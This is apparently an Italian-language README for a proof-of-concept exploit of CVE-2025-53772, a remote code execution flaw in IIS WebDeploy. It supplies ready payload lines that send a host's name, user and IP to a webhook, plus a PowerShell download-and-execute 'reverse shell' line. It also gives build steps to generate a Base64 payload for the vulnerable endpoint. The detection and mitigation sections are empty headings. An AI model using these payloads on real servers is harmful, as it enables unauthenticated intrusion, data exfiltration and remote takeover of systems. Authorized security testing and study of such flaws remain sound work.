
Exploit proof-of-concept per CVE-2025-53772, una vulnerabilità di esecuzione di codice remoto in IIS WebDeploy tramite deserializzazione non sicura. Include generazione personalizzata di payload per raccolta informazioni, esecuzione comandi e reverse shell.
Questo repository contiene un exploit Proof-of-Concept (PoC) per CVE-2025-53772, una vulnerabilità di esecuzione remota di codice in IIS WebDeploy attraverso deserializzazione non sicura.
Questo strumento è solo per scopi educativi e test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo software. Utilizzare solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione.
Modifica il payload in poc.cs alle righe 18-19 per specificare l'azione target:
// Replace with your webhook URL and desired payload
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
Raccolta Informazioni (Consigliato):
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
Esecuzione Comando Semplice:
csharpset.Add("cmd.exe");
set.Add("/c calc.exe"); // Opens calculator
Reverse Shell (Avanzato):
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
L'azione GitHub compilerà automaticamente il PoC e genererà il payload codificato in Base64:
Utilizza il payload Base64 generato contro l'endpoint IIS WebDeploy vulnerabile:

Software interessato: IIS WebDeploy (versioni multiple) Tipo di vulnerabilità: Deserializzazione non sicura che porta a RCE Vettore di attacco: Remoto, non autenticato Gravità: Critica
Se preferisci compilare localmente invece di usare le azioni GitHub:
# Windows with .NET Framework
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs
poc.exe > payload.txt
csc poc.cs
poc.exe
Rilevamento:
Mitigazione:
Dettagli CVE-2025-53772 Avviso di sicurezza Microsoft Database di vulnerabilità NIST